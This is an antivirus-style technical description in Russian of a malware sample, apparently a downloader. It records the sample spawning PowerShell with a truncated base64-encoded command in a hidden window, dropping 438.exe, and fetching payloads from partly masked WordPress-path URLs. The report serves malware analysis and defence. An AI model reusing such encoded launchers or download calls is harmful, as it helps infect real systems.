Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\438.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://hs#.pw/e5t9/zbqlHAhTtRZd/
- http://me##and.com/wp-content/akMmnMBbAPswO/
- http://jo##tud.ru/wp-includes/QIUEwMypGbuDbhAaEimcRofGNckbVn/
- http://jo##tud.ru/
UDP
- DNS ASK de###usa.com
- DNS ASK pl##n.com
- DNS ASK hs#.pw
- DNS ASK me##and.com
- DNS ASK jo##tud.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...' (со скрытым окном)
